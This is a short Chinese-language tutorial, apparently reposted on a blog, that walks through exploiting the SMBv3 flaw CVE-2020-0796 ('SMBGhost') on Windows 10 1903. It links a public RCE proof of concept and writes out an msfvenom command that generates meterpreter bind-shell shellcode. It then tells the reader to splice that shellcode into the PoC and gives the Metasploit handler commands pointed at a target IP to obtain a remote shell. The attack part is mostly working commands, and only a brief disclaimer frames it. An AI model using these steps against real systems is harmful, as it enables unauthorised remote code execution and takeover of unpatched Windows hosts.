Metasploit系列 -- CVE-2020-0796(永恒之黑)getshell

会遗憾,但不会后悔,会争取,但不会强求,能低头,但有底线,全妥协,但有原则,希望这能是你。。。。

---- 网易云热评

本篇内容来自雷石安全实验室。

一、漏洞描述:

该漏洞是由SMBv3处理恶意制作的压缩数据包,未经认证攻击者可能利用此漏洞执行任意代码。

 

二、测试环境及工具:

windows10 1903 64位下载:

ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|4905476096|F28FDC23DA34D55BA466BFD6E91DD311|/

CVE-2020-0796 "poc"下载:

https://github.com/chompie1337/SMBGhost_RCE_PoC

 

三、漏洞利用

1、生成反向连接木马:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

Metasploit系列 -- CVE-2020-0796(永恒之黑)getshell_第1张图片

2、替换POC,将上面生成的代码替换原文中的代码

Metasploit系列 -- CVE-2020-0796(永恒之黑)getshell_第2张图片

 

3、启动Metasploit监听

use exploit/multi/handler

set payload windows/x64/meterpreter/bind_tcp

set lport 4444

set rhost 192.168.1.143  目标主机

run

Metasploit系列 -- CVE-2020-0796(永恒之黑)getshell_第3张图片

3、运行poc,自动建立连接

Metasploit系列 -- CVE-2020-0796(永恒之黑)getshell_第4张图片

Metasploit系列 -- CVE-2020-0796(永恒之黑)getshell_第5张图片

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

Metasploit系列 -- CVE-2020-0796(永恒之黑)getshell_第6张图片

 

你可能感兴趣的:(web安全工具库,Metasploit,CVE-2020-0796,永恒之黑,getshell)